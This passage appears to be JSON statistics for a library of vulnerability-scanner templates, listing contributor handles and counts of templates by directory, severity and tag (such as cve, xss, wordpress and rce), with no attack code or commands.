mendes","count":1},{"name":"omarkurt","count":1},{"name":"notsoevilweasel","count":1},{"name":"none","count":1},{"name":"remonsec","count":1},{"name":"allenwest24","count":1},{"name":"hardik-rathod","count":1},{"name":"manuelbua","count":1},{"name":"petruknisme","count":1},{"name":"justmumu","count":1},{"name":"0xtavian","count":1},{"name":"palanichamy_perumal","count":1},{"name":"elmahdi","count":1},{"name":"phyr3wall","count":1},{"name":"pascalheidmann","count":1},{"name":"compr00t","count":1},{"name":"gpiechnik2","count":1},{"name":"jas37","count":1},{"name":"caon","count":1},{"name":"vikas kundu","count":1},{"name":"hateshape","count":1},{"name":"tehtbl","count":1},{"name":"_harleo","count":1},{"name":"undefl0w","count":1},{"name":"aravind","count":1},{"name":"sickwell","count":1},{"name":"arjunchandarana","count":1},{"name":"omarjezi","count":1},{"name":"viondexd","count":1},{"name":"0xh7ml","count":1},{"name":"kaizensecurity","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"r3nz0","count":1},{"name":"mantissts","count":1},{"name":"y0no","count":1},{"name":"natto97","count":1},{"name":"hakimkt","count":1},{"name":"makyotox","count":1},{"name":"kurohost","count":1},{"name":"hexcat","count":1},{"name":"kareemse1im","count":1},{"name":"dorkerdevil","count":1},{"name":"jc175","count":1},{"name":"chesterblue","count":1},{"name":"supr4s","count":1},{"name":"exceed","count":1},{"name":"davidfegyver","count":1},{"name":"am0nt31r0","count":1},{"name":"furkansenan","count":1},{"name":"_darrenmartyn","count":1},{"name":"pdp","count":1},{"name":"sshell","count":1},{"name":"tirtha_mandal","count":1},{"name":"igibanez","count":1},{"name":"ransomsec","count":1},{"name":"dhiyaneshdki","count":1},{"name":"0xrod","count":1},{"name":"dmartyn","count":1},{"name":"kiks7","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"zy9ard3","count":1},{"name":"mabdullah22","count":1},{"name":"jaimin gondaliya","count":1},{"name":"carlosvieira","count":1},{"name":"bad5ect0r","count":1},{"name":"houdinis","count":1},{"name":"ooooooo_q","count":1},{"name":"official_blackhat13","count":1},{"name":"marcos_iaf","count":1},{"name":"dievus","count":1},{"name":"kiransau","count":1},{"name":"wabafet","count":1},{"name":"miryangjung","count":1},{"name":"bywalks","count":1},{"name":"freakyclown","count":1},{"name":"mayankpandey01","count":1},{"name":"brianlam38","count":1},{"name":"nytr0gen","count":1},{"name":"deena","count":1},{"name":"queencitycyber","count":1},{"name":"mr. bobo hp","count":1},{"name":"yavolo","count":1},{"name":"fopina","count":1},{"name":"mah3sec_","count":1},{"name":"philippdelteil","count":1},{"name":"hazana","count":1},{"name":"ringo","count":1},{"name":"dk999","count":1},{"name":"miroslavsotak","count":1},{"name":"wlayzz","count":1},{"name":"_c0wb0y_","count":1},{"name":"ahmed abou-ela","count":1},{"name":"calumjelrick","count":1},{"name":"pussycat0","count":1},{"name":"j33n1k4","count":1},{"name":"piyushchhiroliya","count":1},{"name":"f1she3","count":1},{"name":"ruppde","count":1},{"name":"b0rn2r00t","count":1},{"name":"skylark-lab","count":1},{"name":"pudsec","count":1},{"name":"httpvoid","count":1},{"name":"lingtren","count":1},{"name":"higor melgaço","count":1},{"name":"ahmed sherif","count":1},{"name":"higor melgaço (eremit4)","count":1},{"name":"florianmaak","count":1},{"name":"daffianfo","count":1},{"name":"retr0","count":1},{"name":"dale clarke","count":1},{"name":"x6263","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"pry0cc","count":1},{"name":"8authur","count":1},{"name":"tim_koopmans","count":1},{"name":"b4uh0lz","count":1},{"name":"lady_bug","count":1},{"name":"th3r4id","count":1},{"name":"mesaglio","count":1},{"name":"shifacyclewla","count":1},{"name":"mihhailsokolov","count":1},{"name":"fq_hsu","count":1},{"name":"ndmalc","count":1},{"name":"anon-artist","count":1},{"name":"borna nematzadeh","count":1},{"name":"kr1shna4garwal","count":1},{"name":"udyz","count":1},{"name":"soyelmago","count":1},{"name":"infosecsanyam","count":1},{"name":"nuts7","count":1},{"name":"paper-pen","count":1},{"name":"realexp3rt","count":1},{"name":"shiar","count":1},{"name":"mbmy","count":1},{"name":"shivampand3y","count":1},{"name":"charanrayudu","count":1},{"name":"lethargynavigator","count":1},{"name":"pratik khalane","count":1},{"name":"blckraven","count":1},{"name":"jaskaran","count":1},{"name":"petergrifin","count":1},{"name":"co0nan","count":1},{"name":"shelld3v","count":1},{"name":"clment cruchet","count":1},{"name":"rojanrijal","count":1},{"name":"millermedia","count":1},{"name":"arliya","count":1},{"name":"jeya seelan","count":1},{"name":"act1on3","count":1},{"name":"remi gascou (podalirius)","count":1},{"name":"willd96","count":1},{"name":"lamscun","count":1},{"name":"s1r1u5_","count":1},{"name":"0xelkomy \u0026 c0nqr0r","count":1},{"name":"bugvsme","count":1},{"name":"unp4ck","count":1},{"name":"thebinitghimire","count":1},{"name":"metascan","count":1},{"name":"patrick pirker","count":1},{"name":"aresx","count":1},{"name":"aaronchen0","count":1},{"name":"secthebit","count":1},{"name":"carrot2","count":1},{"name":"jonathanwalker","count":1},{"name":"dawid-czarnecki","count":1},{"name":"elder tao","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"af001","count":1},{"name":"thirukrishnan","count":1},{"name":"d0rkerdevil","count":1},{"name":"tea","count":1},{"name":"sicksec","count":1},{"name":"aayush vishnoi","count":1},{"name":"topscoder","count":1},{"name":"amnotacat","count":1},{"name":"bartu utku sarp","count":1},{"name":"daviey","count":1},{"name":"hakluke","count":1},{"name":"yashgoti","count":1},{"name":"viniciuspereiras","count":1},{"name":"h4kux","count":1},{"name":"ilovebinbash","count":1},{"name":"mass0ma","count":1},{"name":"5up3r541y4n","count":1},{"name":"farish","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"chron0x","count":1},{"name":"yuansec","count":1},{"name":"galoget","count":1},{"name":"exid","count":1},{"name":"team syslifters / christoph mahrl","count":1},{"name":"guax1","count":1},{"name":"xstp","count":1},{"name":"bjhulst","count":1},{"name":"failopen","count":1},{"name":"udinchan","count":1},{"name":"droberson","count":1},{"name":"1nf1n7y","count":1},{"name":"andysvints","count":1},{"name":"2rs3c","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"p-l-","count":1},{"name":"bibeksapkota (sar00n)","count":1},{"name":"bughuntersurya","count":1},{"name":"majidmc2","count":1},{"name":"shiva (strobes security)","count":1},{"name":"ola456","count":1},{"name":"naglis","count":1},{"name":"thevillagehacker","count":1},{"name":"evolutionsec","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"mrcl0wnlab","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"luqmaan hadia [luqiih](https://github.com/luqiih)","count":1},{"name":"jbertman","count":1},{"name":"kabirsuda","count":1},{"name":"brabbit10","count":1},{"name":"geraldino2","count":1},{"name":"micha3lb3n","count":1},{"name":"akash.c","count":1},{"name":"0xceeb","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"mariam tariq","count":1},{"name":"matt miller","count":1},{"name":"elitebaz","count":1},{"name":"vzamanillo","count":1},{"name":"berkdusunur","count":1},{"name":"furkansayim","count":1},{"name":"ramondunker","count":1},{"name":"open-sec","count":1},{"name":"regala_","count":1},{"name":"intx0x80","count":1},{"name":"lrtk-coder","count":1},{"name":"william söderberg @ withsecure","count":1},{"name":"dwbzn","count":1},{"name":"pjborah","count":1},{"name":"schniggie","count":1},{"name":"noamrathaus","count":1},{"name":"push4d","count":1},{"name":"ayadi","count":1},{"name":"0xceba","count":1},{"name":"cookiehanhoan","count":1},{"name":"ipanda","count":1},{"name":"nerrorsec","count":1},{"name":"kchason","count":1},{"name":"akokonunes","count":1},{"name":"shockwave","count":1},{"name":"iampritam","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"arall","count":1},{"name":"exploitation","count":1},{"name":"ptonewreckin","count":1},{"name":"un-fmunozs","count":1},{"name":"momen eldawakhly","count":1},{"name":"husain","count":1},{"name":"th3.d1p4k","count":1},{"name":"ohlinge","count":1},{"name":"sinsinology","count":1},{"name":"sec_hawk","count":1},{"name":"aringo","count":1},{"name":"professorabhay","count":1},{"name":"retr02332","count":1},{"name":"jeya.seelan","count":1},{"name":"zeyad azima","count":1},{"name":"therealtoastycat","count":1},{"name":"ofjaaah","count":1},{"name":"andirrahmani1","count":1},{"name":"akshansh","count":1},{"name":"thelicato","count":1},{"name":"elouhi","count":1},{"name":"alperenkesk","count":1},{"name":"booboohq","count":1},{"name":"ph33rr","count":1},{"name":"mhdsamx","count":1},{"name":"adrianmf","count":1},{"name":"numan türle","count":1},{"name":"opencirt","count":1},{"name":"ok_bye_now","count":1},{"name":"mukundbhuva","count":1},{"name":"djoevanka","count":1},{"name":"rodnt","count":1},{"name":"hanlaomo","count":1},{"name":"alexrydzak","count":1},{"name":"noah @thesubtlety","count":1},{"name":"keni0k","count":1},{"name":"zandros0","count":1},{"name":"iphantasmic","count":1},{"name":"whynotke","count":1},{"name":"evan rubinstien","count":1},{"name":"stupidfish","count":1},{"name":"alevsk","count":1},{"name":"0xd0ff9","count":1},{"name":"dabla","count":1},{"name":"hczdmr","count":1},{"name":"nagli","count":1},{"name":"b0yd","count":1},{"name":"rotemreiss","count":1},{"name":"prettyboyaaditya","count":1},{"name":"kailashbohara","count":1},{"name":"0ut0fb4nd","count":1},{"name":"michael wedl","count":1},{"name":"amanrawat","count":1},{"name":"rotembar","count":1},{"name":"kagamigawa","count":1},{"name":"flag007","count":1},{"name":"sherlocksecurity","count":1},{"name":"dali","count":1},{"name":"zhenwarx","count":1},{"name":"erethon","count":1},{"name":"matthew nickerson (b0than) @ layer 8 security","count":1},{"name":"mubassirpatel","count":1},{"name":"gboddin","count":1},{"name":"liquidsec","count":1},{"name":"unkl4b","count":1},{"name":"juicypotato1","count":1},{"name":"vinit989","count":1},{"name":"alex","count":1},{"name":"ynnirc","count":1},{"name":"jcockhren","count":1},{"name":"colbyjack1134","count":1},{"name":"esonhugh","count":1},{"name":"rubina119","count":1},{"name":"aringo-bf","count":1},{"name":"jiheon-dev","count":1},{"name":"orpheus","count":1},{"name":"manasmbellani","count":1},{"name":"ahmetpergamum","count":1},{"name":"couskito","count":1},{"name":"aaban solutions","count":1},{"name":"becivells","count":1},{"name":"rivalsec","count":1},{"name":"tirtha","count":1},{"name":"w0tx","count":1},{"name":"qlkwej","count":1},{"name":"rschio","count":1},{"name":"myst7ic","count":1},{"name":"toufik-airane","count":1},{"name":"oscarintherocks","count":1},{"name":"irshadahamed","count":1},{"name":"ramkrishna sawant","count":1},{"name":"knassar702","count":1},{"name":"mzack9999","count":1},{"name":"jub0bs","count":1},{"name":"patralos","count":1},{"name":"nielsing","count":1},{"name":"luqmaan hadia","count":1},{"name":"danigoland","count":1},{"name":"0xteles","count":1},{"name":"ldionmarcil","count":1},{"name":"barthy.koeln","count":1},{"name":"lark lab","count":1},{"name":"xshuden","count":1},{"name":"mrharshvardhan","count":1},{"name":"osamahamad","count":1},{"name":"xcapri","count":1},{"name":"juliosmelo","count":1},{"name":"jbaines-r7","count":1},{"name":"duty_1g","count":1},{"name":"mohammad reza omrani | @omranisecurity","count":1},{"name":"fmunozs","count":1},{"name":"luisfelipe146","count":1},{"name":"narluin","count":1}],"directory":[{"name":"http","count":6290},{"name":"file","count":309},{"name":"workflows","count":190},{"name":"network","count":116},{"name":"ssl","count":25},{"name":"dns","count":17},{"name":"headless","count":9},{"name":"TEMPLATES-STATS.json","count":1},{"name":"contributors.json","count":1},{"name":"cves.json","count":1}],"severity":[{"name":"info","count":3199},{"name":"high","count":1283},{"name":"medium","count":1261},{"name":"critical","count":765},{"name":"low","count":229},{"name":"unknown","count":29}],"types":[{"name":"file","count":309},{"name":"dns","count":17}]} +{"tags":[{"name":"cve","count":2054},{"name":"panel","count":985},{"name":"wordpress","count":831},{"name":"exposure","count":784},{"name":"xss","count":726},{"name":"wp-plugin","count":721},{"name":"osint","count":672},{"name":"tech","count":632},{"name":"edb","count":598},{"name":"lfi","count":587},{"name":"misconfig","count":509},{"name":"rce","count":467},{"name":"packetstorm","count":446},{"name":"cve2021","count":442},{"name":"cve2022","count":430},{"name":"wpscan","count":382},{"name":"wp","count":330},{"name":"file","count":318},{"name":"unauth","count":297},{"name":"authenticated","count":253},{"name":"cve2020","count":248},{"name":"token-spray","count":241},{"name":"sqli","count":233},{"name":"kev","count":217},{"name":"top-200","count":212},{"name":"osint-social","count":210},{"name":"config","count":200},{"name":"","count":195},{"name":"token","count":193},{"name":"oast","count":183},{"name":"cve2023","count":174},{"name":"intrusive","count":169},{"name":"login","count":162},{"name":"default-login","count":161},{"name":"iot","count":159},{"name":"cve2018","count":157},{"name":"apache","count":157},{"name":"cve2019","count":156},{"name":"joomla","count":137},{"name":"malware","count":131},{"name":"redirect","count":118},{"name":"detect","count":116},{"name":"cve2010","count":112},{"name":"network","count":105},{"name":"files","count":104},{"name":"ssrf","count":101},{"name":"top-100","count":100},{"name":"auth-bypass","count":99},{"name":"router","count":99},{"name":"cms","count":98},{"name":"cve2017","count":80},{"name":"disclosure","count":78},{"name":"devops","count":77},{"name":"takeover","count":75},{"name":"install","count":72},{"name":"seclists","count":70},{"name":"oracle","count":66},{"name":"oss","count":61},{"name":"fileupload","count":56},{"name":"cisco","count":56},{"name":"adobe","count":55},{"name":"cve2015","count":55},{"name":"cve2016","count":54},{"name":"google","count":53},{"name":"tokens","count":52},{"name":"atlassian","count":48},{"name":"logs","count":46},{"name":"tenable","count":46},{"name":"osint-gaming","count":45},{"name":"huntr","count":45},{"name":"vmware","count":45},{"name":"vulhub","count":44},{"name":"debug","count":44},{"name":"aem","count":44},{"name":"hackerone","count":43},{"name":"osint-hobby","count":42},{"name":"c2","count":42},{"name":"plugin","count":42},{"name":"cve2014","count":42},{"name":"osint-porn","count":42},{"name":"generic","count":41},{"name":"springboot","count":38},{"name":"traversal","count":37},{"name":"jira","count":36},{"name":"aws","count":35},{"name":"kubernetes","count":35},{"name":"listing","count":35},{"name":"osint-misc","count":35},{"name":"injection","count":35},{"name":"misc","count":35},{"name":"cnvd","count":34},{"name":"ir","count":33},{"name":"deserialization","count":32},{"name":"osint-coding","count":30},{"name":"sap","count":29},{"name":"php","count":29},{"name":"log4j","count":29},{"name":"fuzz","count":28},{"name":"osint-tech","count":28},{"name":"gitlab","count":27},{"name":"api","count":27},{"name":"microsoft","count":26},{"name":"jndi","count":26},{"name":"cve2012","count":26},{"name":"proxy","count":25},{"name":"k8s","count":25},{"name":"osint-finance","count":24},{"name":"osint-shopping","count":24},{"name":"osint-business","count":24},{"name":"manageengine","count":24},{"name":"osint-images","count":24},{"name":"firewall","count":24},{"name":"stored-xss","count":23},{"name":"amazon","count":23},{"name":"wp-theme","count":23},{"name":"zoho","count":23},{"name":"keys","count":22},{"name":"cloud","count":21},{"name":"dlink","count":21},{"name":"tomcat","count":21},{"name":"weblogic","count":21},{"name":"msf","count":21},{"name":"ibm","count":21},{"name":"fortinet","count":20},{"name":"cicd","count":20},{"name":"github","count":20},{"name":"ssl","count":20},{"name":"camera","count":20},{"name":"admin","count":20},{"name":"lfr","count":19},{"name":"struts","count":19},{"name":"jenkins","count":19},{"name":"dns","count":19},{"name":"rukovoditel","count":19},{"name":"ftp","count":18},{"name":"printer","count":18},{"name":"wavlink","count":18},{"name":"service","count":18},{"name":"grafana","count":18},{"name":"osint-music","count":18},{"name":"xxe","count":17},{"name":"nginx","count":17},{"name":"cve2011","count":17},{"name":"backup","count":16},{"name":"cve2009","count":16},{"name":"citrix","count":16},{"name":"osint-blog","count":16},{"name":"jarm","count":15},{"name":"cve2008","count":15},{"name":"android","count":15},{"name":"status","count":15},{"name":"hp","count":15},{"name":"magento","count":15},{"name":"java","count":15},{"name":"confluence","count":14},{"name":"coldfusion","count":14},{"name":"domainmod","count":14},{"name":"cve2013","count":14},{"name":"npm","count":14},{"name":"zyxel","count":14},{"name":"osint-health","count":14},{"name":"jboss","count":14},{"name":"mail","count":14},{"name":"woocommerce","count":14},{"name":"osint-art","count":14},{"name":"audit","count":14},{"name":"nodejs","count":14},{"name":"enum","count":14},{"name":"cnvd2021","count":14},{"name":"osint-dating","count":13},{"name":"bypass","count":13},{"name":"osint-political","count":13},{"name":"airflow","count":13},{"name":"creds-stuffing","count":13},{"name":"login-check","count":13},{"name":"azure","count":13},{"name":"fortigate","count":13},{"name":"vpn","count":13},{"name":"laravel","count":13},{"name":"abstractapi","count":13},{"name":"ruijie","count":13},{"name":"cuppa","count":13},{"name":"dell","count":12},{"name":"dashboard","count":12},{"name":"graphql","count":12},{"name":"sonicwall","count":12},{"name":"alibaba","count":12},{"name":"kafka","count":12},{"name":"rails","count":12},{"name":"ruby","count":12},{"name":"netgear","count":12},{"name":"git","count":12},{"name":"microweber","count":12},{"name":"backdoor","count":12},{"name":"zimbra","count":12},{"name":"webserver","count":12},{"name":"drupal","count":12},{"name":"auth","count":12},{"name":"netsweeper","count":12},{"name":"online-fire-reporting","count":11},{"name":"spring","count":11},{"name":"xstream","count":11},{"name":"setup","count":11},{"name":"ecology","count":11},{"name":"docker","count":11},{"name":"phpmyadmin","count":11},{"name":"osint-video","count":11},{"name":"fastjson","count":10},{"name":"redis","count":10},{"name":"headless","count":10},{"name":"digitalocean","count":10},{"name":"jolokia","count":10},{"name":"symfony","count":10},{"name":"django","count":10},{"name":"prometheus","count":10},{"name":"ssti","count":10},{"name":"solarview","count":10},{"name":"db","count":10},{"name":"icewarp","count":10},{"name":"node","count":10},{"name":"ssh","count":10},{"name":"thinkphp","count":10},{"name":"dedecms","count":10},{"name":"windows","count":10},{"name":"glpi","count":10},{"name":"wso2","count":9},{"name":"zabbix","count":9},{"name":"versa","count":9},{"name":"elasticsearch","count":9},{"name":"opencats","count":9},{"name":"firebase","count":9},{"name":"vcenter","count":9},{"name":"solr","count":9},{"name":"installer","count":9},{"name":"prestashop","count":9},{"name":"gitea","count":9},{"name":"bitbucket","count":9},{"name":"cnvd2020","count":9},{"name":"scada","count":9},{"name":"druid","count":9},{"name":"pfsense","count":9},{"name":"cache","count":9},{"name":"kube","count":9},{"name":"sitecore","count":9},{"name":"jetbrains","count":8},{"name":"hikvision","count":8},{"name":"smtp","count":8},{"name":"osint-news","count":8},{"name":"atom","count":8},{"name":"mirai","count":8},{"name":"exchange","count":8},{"name":"metadata","count":8},{"name":"emerge","count":8},{"name":"vbulletin","count":8},{"name":"console","count":8},{"name":"manager","count":8},{"name":"oauth","count":8},{"name":"spotweb","count":8},{"name":"unauthenticated","count":8},{"name":"recon","count":8},{"name":"hms","count":8},{"name":"ognl","count":8},{"name":"default-page","count":8},{"name":"config-audit","count":8},{"name":"bucket","count":8},{"name":"crlf","count":8},{"name":"cisco-switch","count":8},{"name":"iis","count":8},{"name":"hashicorp","count":7},{"name":"blind","count":7},{"name":"ivanti","count":7},{"name":"mobileiron","count":7},{"name":"vms","count":7},{"name":"seeyon","count":7},{"name":"maps","count":7},{"name":"samsung","count":7},{"name":"squirrelmail","count":7},{"name":"facebook","count":7},{"name":"fortios","count":7},{"name":"gogs","count":7},{"name":"nagios","count":7},{"name":"huawei","count":7},{"name":"nacos","count":7},{"name":"blockchain","count":7},{"name":"go","count":7},{"name":"shopify","count":7},{"name":"rconfig","count":7},{"name":"odoo","count":7},{"name":"secret","count":7},{"name":"nagiosxi","count":7},{"name":"oa","count":7},{"name":"ec2","count":7},{"name":"ofbiz","count":7},{"name":"discord","count":7},{"name":"dropbox","count":7},{"name":"sangfor","count":7},{"name":"error","count":7},{"name":"avtech","count":7},{"name":"websphere","count":7},{"name":"sophos","count":7},{"name":"liferay","count":6},{"name":"plesk","count":6},{"name":"s3","count":6},{"name":"newrelic","count":6},{"name":"pmb","count":6},{"name":"bigip","count":6},{"name":"jamf","count":6},{"name":"leak","count":6},{"name":"opensis","count":6},{"name":"artica","count":6},{"name":"mongodb","count":6},{"name":"74cms","count":6},{"name":"webmin","count":6},{"name":"jetty","count":6},{"name":"doctor-appointment-system","count":6},{"name":"tikiwiki","count":6},{"name":"symantec","count":6},{"name":"jeecg","count":6},{"name":"sonarqube","count":6},{"name":"elfinder","count":6},{"name":"microstrategy","count":6},{"name":"database","count":6},{"name":"keycloak","count":6},{"name":"activemq","count":6},{"name":"openvpn","count":6},{"name":"zhiyuan","count":6},{"name":"moodle","count":6},{"name":"fpd","count":6},{"name":"slack","count":6},{"name":"cacti","count":6},{"name":"cobbler","count":6},{"name":"flutterwave","count":6},{"name":"magmi","count":6},{"name":"filemanager","count":6},{"name":"lucee","count":6},{"name":"nexus","count":6},{"name":"solarwinds","count":6},{"name":"minio","count":6},{"name":"python","count":6},{"name":"kubelet","count":6},{"name":"akamai","count":5},{"name":"jupyter","count":5},{"name":"elastic","count":5},{"name":"microfocus","count":5},{"name":"xmlrpc","count":5},{"name":"asana","count":5},{"name":"asp","count":5},{"name":"adminer","count":5},{"name":"cockpit","count":5},{"name":"sql","count":5},{"name":"square","count":5},{"name":"hybris","count":5},{"name":"terramaster","count":5},{"name":"typo3","count":5},{"name":"resin","count":5},{"name":"strapi","count":5},{"name":"caucho","count":5},{"name":"parallels","count":5},{"name":"firmware","count":5},{"name":"storage","count":5},{"name":"bmc","count":5},{"name":"circarlife","count":5},{"name":"zzzcms","count":5},{"name":"rseenet","count":5},{"name":"geoserver","count":5},{"name":"avideo","count":5},{"name":"paypal","count":5},{"name":"web3","count":5},{"name":"instrusive","count":5},{"name":"vrealize","count":5},{"name":"rfi","count":5},{"name":"server","count":5},{"name":"kkfileview","count":5},{"name":"jwt","count":5},{"name":"fatpipe","count":5},{"name":"openemr","count":5},{"name":"couchdb","count":5},{"name":"heroku","count":5},{"name":"metinfo","count":5},{"name":"ethereum","count":5},{"name":"tenda","count":5},{"name":"phpinfo","count":5},{"name":"apisix","count":5},{"name":"gocd","count":5},{"name":"avaya","count":5},{"name":"carrental","count":5},{"name":"awstats","count":5},{"name":"ruckus","count":5},{"name":"mailchimp","count":4},{"name":"mikrotik","count":4},{"name":"cnvd2019","count":4},{"name":"finicity","count":4},{"name":"log","count":4},{"name":"metasploit","count":4},{"name":"jellyfin","count":4},{"name":"javascript","count":4},{"name":"wcs","count":4},{"name":"datadog","count":4},{"name":"artifactory","count":4},{"name":"candidats","count":4},{"name":"spark","count":4},{"name":"pixie","count":4},{"name":"dropbear","count":4},{"name":"zend","count":4},{"name":"umbraco","count":4},{"name":"metabase","count":4},{"name":"httpserver","count":4},{"name":"aspose","count":4},{"name":"file-upload","count":4},{"name":"casaos","count":4},{"name":"photo","count":4},{"name":"age-encryption","count":4},{"name":"telerik","count":4},{"name":"newstatpress","count":4},{"name":"nextjs","count":4},{"name":"froxlor","count":4},{"name":"hpe","count":4},{"name":"thinkcmf","count":4},{"name":"gnuboard","count":4},{"name":"dolibarr","count":4},{"name":"panos","count":4},{"name":"ldap","count":4},{"name":"powerjob","count":4},{"name":"mostra","count":4},{"name":"tls","count":4},{"name":"ampache","count":4},{"name":"mautic","count":4},{"name":"ebs","count":4},{"name":"search","count":4},{"name":"centos","count":4},{"name":"flickr","count":4},{"name":"flink","count":4},{"name":"yeswiki","count":4},{"name":"prtg","count":4},{"name":"graylog","count":4},{"name":"kentico","count":4},{"name":"easypost","count":4},{"name":"pentaho","count":4},{"name":"rabbitmq","count":4},{"name":"webshell","count":4},{"name":"phppgadmin","count":4},{"name":"harbor","count":4},{"name":"elementor","count":4},{"name":"ems","count":4},{"name":"beyondtrust","count":4},{"name":"seagate","count":4},{"name":"springcloud","count":4},{"name":"consul","count":4},{"name":"horde","count":4},{"name":"cve2007","count":4},{"name":"openstack","count":4},{"name":"cve2005","count":4},{"name":"linkerd","count":4},{"name":"express","count":4},{"name":"concrete","count":4},{"name":"telesquare","count":4},{"name":"kibana","count":4},{"name":"goanywhere","count":4},{"name":"mostracms","count":4},{"name":"nosqli","count":4},{"name":"pie-register","count":4},{"name":"stripe","count":4},{"name":"hoteldruid","count":4},{"name":"axigen","count":4},{"name":"redmine","count":4},{"name":"zte","count":4},{"name":"openfire","count":4},{"name":"httpd","count":4},{"name":"voip","count":4},{"name":"qdpm","count":4},{"name":"swagger","count":4},{"name":"roxy","count":4},{"name":"kevinlab","count":4},{"name":"hongdian","count":4},{"name":"osint-archived","count":4},{"name":"churchcrm","count":4},{"name":"jorani","count":4},{"name":"confluent","count":4},{"name":"bittrex","count":4},{"name":"cloudflare","count":4},{"name":"panabit","count":4},{"name":"royalevent","count":4},{"name":"puppet","count":4},{"name":"sentry","count":4},{"name":"codeigniter","count":4},{"name":"mlflow","count":4},{"name":"aura","count":4},{"name":"mysql","count":4},{"name":"postmessage","count":4},{"name":"sendgrid","count":4},{"name":"arcgis","count":4},{"name":"qnap","count":4},{"name":"grav","count":4},{"name":"totolink","count":3},{"name":"sitemap","count":3},{"name":"superadmin","count":3},{"name":"superset","count":3},{"name":"purchase-order","count":3},{"name":"axway","count":3},{"name":"info","count":3},{"name":"droneci","count":3},{"name":"openwrt","count":3},{"name":"shell","count":3},{"name":"password","count":3},{"name":"lotus","count":3},{"name":"eshop","count":3},{"name":"cnvd2022","count":3},{"name":"zeroshell","count":3},{"name":"loytec","count":3},{"name":"openbmcs","count":3},{"name":"webmail","count":3},{"name":"fileman","count":3},{"name":"gradle","count":3},{"name":"payara","count":3},{"name":"3cx","count":3},{"name":"h3c","count":3},{"name":"telnet","count":3},{"name":"ansible","count":3},{"name":"jfrog","count":3},{"name":"proftpd","count":3},{"name":"octobercms","count":3},{"name":"redash","count":3},{"name":"dzzoffice","count":3},{"name":"fanwei","count":3},{"name":"smb","count":3},{"name":"securepoint","count":3},{"name":"ixcache","count":3},{"name":"pyload","count":3},{"name":"rancher","count":3},{"name":"dubbo","count":3},{"name":"fanruan","count":3},{"name":"yzmcms","count":3},{"name":"tongda","count":3},{"name":"hsphere","count":3},{"name":"servicenow","count":3},{"name":"chamilo","count":3},{"name":"magnolia","count":3},{"name":"papercut","count":3},{"name":"aria","count":3},{"name":"epson","count":3},{"name":"intercom","count":3},{"name":"webalizer","count":3},{"name":"asus","count":3},{"name":"modem","count":3},{"name":"clientid","count":3},{"name":"saltstack","count":3},{"name":"digitalrebar","count":3},{"name":"teamcity","count":3},{"name":"clusterengine","count":3},{"name":"postman","count":3},{"name":"apollo","count":3},{"name":"twitter","count":3},{"name":"getsimple","count":3},{"name":"petya","count":3},{"name":"js","count":3},{"name":"itop","count":3},{"name":"jeesns","count":3},{"name":"labkey","count":3},{"name":"idrac","count":3},{"name":"sony","count":3},{"name":"pega","count":3},{"name":"cas","count":3},{"name":"zendesk","count":3},{"name":"rocketchat","count":3},{"name":"flexvnf","count":3},{"name":"xerox","count":3},{"name":"unifi","count":3},{"name":"sugarcrm","count":3},{"name":"mailgun","count":3},{"name":"netdata","count":3},{"name":"gateway","count":3},{"name":"webcam","count":3},{"name":"pypi","count":3},{"name":"bruteforce","count":3},{"name":"sharepoint","count":3},{"name":"influxdb","count":3},{"name":"sharefile","count":3},{"name":"sysaid","count":3},{"name":"httpbin","count":3},{"name":"zerof","count":3},{"name":"linux","count":3},{"name":"netlify","count":3},{"name":"shiro","count":3},{"name":"moveit","count":3},{"name":"nuxtjs","count":3},{"name":"kingsoft","count":3},{"name":"wbce","count":3},{"name":"credential","count":3},{"name":"messaging","count":3},{"name":"tableau","count":3},{"name":"nortek","count":3},{"name":"finecms","count":3},{"name":"dom","count":3},{"name":"piwigo","count":3},{"name":"nuuo","count":3},{"name":"telegram","count":3},{"name":"mcafee","count":3},{"name":"nuget","count":3},{"name":"temenos","count":3},{"name":"aptus","count":3},{"name":"rlm","count":3},{"name":"kfm","count":3},{"name":"env","count":3},{"name":"openam","count":3},{"name":"axis","count":3},{"name":"dotcms","count":3},{"name":"purchase-order-management-system","count":3},{"name":"weiphp","count":3},{"name":"osticket","count":3},{"name":"carel","count":3},{"name":"bitrix","count":3},{"name":"drawio","count":3},{"name":"yonyou","count":3},{"name":"forum","count":3},{"name":"mapbox","count":3},{"name":"movable","count":3},{"name":"circleci","count":3},{"name":"thruk","count":3},{"name":"ueditor","count":3},{"name":"synology","count":3},{"name":"bigant","count":3},{"name":"targa","count":3},{"name":"thinfinity","count":3},{"name":"metersphere","count":3},{"name":"discourse","count":3},{"name":"glassfish","count":3},{"name":"voipmonitor","count":3},{"name":"actuator","count":3},{"name":"evlink","count":3},{"name":"fuelcms","count":3},{"name":"mpsec","count":3},{"name":"covenant","count":3},{"name":"hongfan","count":3},{"name":"geowebserver","count":3},{"name":"flutter","count":3},{"name":"airtable","count":3},{"name":"yii","count":3},{"name":"backdrop","count":3},{"name":"postgresql","count":3},{"name":"webadmin","count":3},{"name":"kavita","count":3},{"name":"webkul-qloapps","count":3},{"name":"poms","count":3},{"name":"fastly","count":3},{"name":"dahua","count":3},{"name":"lighttpd","count":3},{"name":"pip","count":3},{"name":"graph","count":3},{"name":"processwire","count":3},{"name":"splunk","count":3},{"name":"globalprotect","count":3},{"name":"trendnet","count":3},{"name":"steve","count":3},{"name":"lansweeper","count":3},{"name":"listserv","count":3},{"name":"sftp","count":3},{"name":"segment","count":3},{"name":"wordfence","count":3},{"name":"trixbox","count":3},{"name":"samba","count":3},{"name":"cluster","count":3},{"name":"dos","count":3},{"name":"etsy","count":3},{"name":"mantisbt","count":3},{"name":"pulsar","count":3},{"name":"rat","count":3},{"name":"empirecms","count":3},{"name":"key","count":3},{"name":"angular","count":3},{"name":"openai","count":3},{"name":"landray","count":3},{"name":"r-seenet","count":3},{"name":"subrion","count":3},{"name":"contentful","count":3},{"name":"rackn","count":3},{"name":"waf","count":3},{"name":"selea","count":3},{"name":"axis2","count":3},{"name":"linksys","count":3},{"name":"mongo","count":3},{"name":"ampps","count":3},{"name":"buffalo","count":3},{"name":"dreambox","count":3